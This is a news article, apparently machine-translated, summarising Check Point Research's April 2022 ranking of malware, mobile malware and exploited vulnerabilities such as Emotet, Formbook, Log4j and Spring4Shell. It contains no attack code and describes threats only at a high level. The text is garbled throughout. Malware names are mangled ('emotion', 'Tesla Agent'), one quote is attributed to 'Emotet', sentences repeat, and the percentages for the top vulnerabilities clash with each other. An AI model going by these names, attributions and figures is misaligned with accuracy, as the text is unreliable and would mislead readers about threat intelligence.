PARIS: Check Point Research Top Malware Report, Major Rank Changes

In France, the most active malware is Emotet, Formbook and AgentTesla.

Check Point Research (CPR), Threat Intelligence Division Check Point® Software Technologies Ltd. (NASDAQ:CHKP), one of the world’s leading cybersecurity solution providers, has published its April 2022 Global Threat Ranking. Researchers report that Emotet, an advanced, self-propagating and modular Trojan, is still the most prevalent malware, affecting 6% of organizations worldwide.. This did not prevent other malware in the ranking from showing some activity. Tofsee and Nanocore dropped off the list and were replaced by Formbook and Lokibot, now the second and sixth most common malware.

Emotet’s higher score in March (10%) was mainly due to a specific Easter-themed scam, but this month’s drop could also be explained by Microsoft’s decision to disable certain macros associated with Office files, which affects how Emotet is typically delivered. . Indeed, according to some reports, Emotet has a new delivery method: phishing emails containing the OneDrive URL. Emotet has many uses after successfully bypassing machine security. Through its sophisticated distribution and assimilation methods, Emotet offers other malware to cybercriminals on darknet forums, including banking trojans, ransomware, botnets, and more. Thus, once Emotet finds a breach, the consequences may vary depending on the malware released after the breach was compromised.

Elsewhere, information thief Lokibot re-entered the rankings at number six after a massive spam campaign that delivered malware via xlsx files resembling legitimate invoices. This phenomenon, along with the advent of Formbook, has affected the position of other malware, for example, AgentTesla’s Advanced Remote Access Trojan (RAT) dropped from second to third place.

At the end of March, critical vulnerabilities were discovered in the Spring Java Framework, known as Spring4Shell, and since then, many attackers have exploited them to spread Mirai, the ninth most common malware that month.

“The cyber threat landscape is constantly changing, and large companies such as Microsoft are influencing the parameters within which cybercriminals can operate. Attackers need to be more creative in their distribution of malware, as evidenced by the new delivery method used by Emotet,” said Emotet. Maya Horowitz, Vice President of Research at Check Point. “In addition, the Spring4Shell vulnerability made headlines this month. Although it is not yet in the top ten vulnerabilities, it is worth noting that more than 35% of organizations worldwide have already been affected by this threat in the first month alone, and therefore we expect to see its progress in the list within a few months. to come. »

CPR also reported this month that the education and research sector remains the most targeted by cybercriminals worldwide. “Disclosure of Exposed Git Repository on a Web Server” is the most commonly exploited vulnerability, affecting 46% of organizations worldwide.followed by “Apache Log4j Remote Code Execution” by a small margin. Apache Struts ParametersInterceptor ClassLoader “Security Bypass” jumps up the index, now in third place with an overall impact of 45%.

Top Malware Families

* Arrows indicate the change in position from the previous month.

This month, emotion remains the most prevalent malware, affecting 6% of organizations worldwide, followed by Formbookwhich affects 3% of organizations, and Tesla Agentwhich affects 2%.

one. emotion Emotet is an advanced modular self-propagating Trojan. Emotet, once used as a banking Trojan, has recently been used as a distributor of other malware or malicious campaigns. It uses several techniques to ensure staying power and evasive techniques to avoid detection. Moreover, it can be spread through phishing spam emails containing malicious attachments or links.

2. Formbook Formbook is an Infostealer targeting the Windows operating system, first discovered in 2016. It is positioned as malware as a service (MaaS) in underground hacker forums due to its strong evasive methods and relatively low price. FormBook collects credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files at the behest of its C&C.

3. Tesla agent… Tesla Agent is an advanced RAT that functions as a keylogger and information thief, able to track and collect the victim’s keystrokes, system keyboard, take screenshots, and extract the credentials of various software installed on the victim’s computer, such as Google Chrome, Mozilla Firefox, and Microsoft outlook. mail client.)

The most attacked industries in the world

This month, the most targeted industry in the world was education/research, followed by government/military organizations, as well as ISPs and managed service providers. (ISP and MSP).

one. Teaching and research

2. Government services and military

3. Internet Service Providers/Managed Service Providers (ISPs/MSPs)

Main Exploited Vulnerabilities

This month, “Disclosure of information about the Git repository on the web server” is the most widely exploited vulnerability affecting 46% of organizations worldwide, followed by “Remote Execution of Apache Log4j Code” which affects 46% of organizations worldwide. ” Apache Struts ParametersInterceptor ClassLoader security bypass now ranks third in the list of the most exploited vulnerabilities with a total impact of 45%.

one. Disclosing information about an exposed Git repository on a web server – A vulnerability was reported for getting information in a Git repository. Successful exploitation of this vulnerability could allow account information to be unintentionally published.

2. Apache Log4j remote code execution (CVE-2021-44228) A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.

3. Apache Struts ParametersInterceptor ClassLoader security bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) – A security bypass vulnerability exists in Apache Struts. The vulnerability is caused by inadequate validation of the data processed by the ParametersInterceptor, which allows manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter in the request.

The best mobile malware

This month, AlienBot is the most prevalent mobile malware, followed by FluBot and xHelper.

one. AlienBot – The AlienBot malware family is malware-as-a-service (MaaS) for Android devices that allows a remote attacker to first inject malicious code into legitimate financial applications. The attacker gains access to the accounts of the victims and ultimately gains full control over their device.

2. FluBot – FluBot – An Android botnet distributed via phishing (Smishing) text messages, most often posing as logistics delivery brands. Once the user clicks on the link contained in the message, they are redirected to download a fake application containing FluBot. Once installed, the malware has various options for collecting credentials and participating in the smashing operation itself, including downloading contact lists as well as sending SMS messages to other phone numbers.

3. xHelper – A malicious application discovered in March 2019 was used to download other malicious applications and display ads. The application can escape the attention of users and be reinstalled if it was removed.

The Check Point Global Threat Impact Index and its ThreatCloud Map are based on ThreatCloud Intelligence from Check Point. ThreatCloud provides real-time threat intelligence from hundreds of millions of sensors worldwide across networks, devices and mobile devices. The Check Point Global Threat Impact Index and its ThreatCloud Map are based on ThreatCloud Intelligence from Check Point.

As soon as the user clicks on the link in the message, FluBot is installed and has access to all sensitive information on the phone.

A full list of the top 10 malware families in April is available on the Checkpoint Blog.

Follow Check Point research on:



Check Point Research

Check Point Research (CPR) provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider information community. The research team collects and analyzes global cyber attack data stored in ThreatCloud to keep hackers at bay and ensure all Check Point products are updated with the latest security features. The research team is made up of over one hundred analysts and researchers who collaborate with other security providers, law enforcement, and several CERTs.

Check Point Software Technologies Ltd. Check Point Software Technologies Ltd. ( is a leading provider of cybersecurity solutions for governments and businesses around the world. The Check Point Infinity portfolio protects businesses and public organizations from Gen 5 cyberattacks with unrivaled blocking rates for malware, ransomware, and other types of attacks. Infinity is comprised of three core pillars that provide complete security and fifth-generation threat prevention for enterprise environments: Check Point Harmony for remote users, Check Point CloudGuard for automatic cloud protection, and Check Point Quantum for protecting network perimeters and data centers. the industry’s most comprehensive and intuitive unified security management. Check Point protects over 100,000 businesses of all sizes.

Back to top button